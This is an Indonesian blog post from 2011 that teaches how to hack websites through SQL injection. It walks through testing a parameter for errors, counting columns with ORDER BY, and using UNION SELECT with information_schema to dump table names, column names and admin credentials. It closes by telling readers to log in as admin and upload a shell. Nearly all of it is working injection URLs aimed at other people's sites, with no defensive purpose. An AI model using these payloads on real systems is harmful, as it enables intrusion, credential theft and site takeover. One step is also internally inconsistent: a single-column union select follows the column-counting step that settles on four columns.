inject sql (hack web) inject sql (hack web)

Selasa, 21 Juni 2011

inject sql (hack web)

Cara ini merupakan cara untuk menyusup ke database admin website. Apabila website tersebut mempunyai celah, maka mudahlah untuk menyusup ke database website itu dan kita bisa mendapatkan acount & passwordnya.

Banyak sekali berbagai cara melakukan SQL injection dan Backdoor salah satunya dengan cara ini, perhatikan cara dibawah ini:


Pertama kita tetapkan target terlebih dahulu
Contoh: [site]/news_Event/newsDetail.php?ID=2

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'

Apabila muncul pesan error berarti kita dapat menginject website tersebut, tetapi apabila tidak terdapat pesan error carilah website lainnya yang masih memilki celah.

Kemudian
Mencari dan menghitung jumlah table yang ada dalam databasenya
Gunakan perintah : +order+by+

Contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

Sekarang cek secara satu per satu
Contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

Sehingga muncul error atau hilang pesan error
Misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

Berarti yang kita ambil adalah sampai angka 4 menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

Misalkan pada angka 5 muncul error.

Selanjutnya
Untuk mengeluarkan angka berapa yang muncul gunakan perintah union karena tadi error sampai angka 5
Maka:
[site]/news_Event/newsDetail.php?ID=-2+union+select+4--

Ok , yg keluar angka 2
Gunakan perintah version() untuk mengecek versi sql yg dipakai masukan perintah tsb pada angka yg keluar tadi
Contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

Lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema


Dan selanjutnya
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

Contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+
from+information_schema.tables+where+table_schema=database()--

seumpama yg kita cari adalah "admin"

And than
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+
from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.

Contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(co
lumn_name),3,4+from+information_schema.columns+where+table_name
=0x61646d696e--


Kemudian
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Na
me,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang

ket: 0x3a sama dengan : <- titik dua


Terakhir :
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian

0 komentar:

Posting Komentar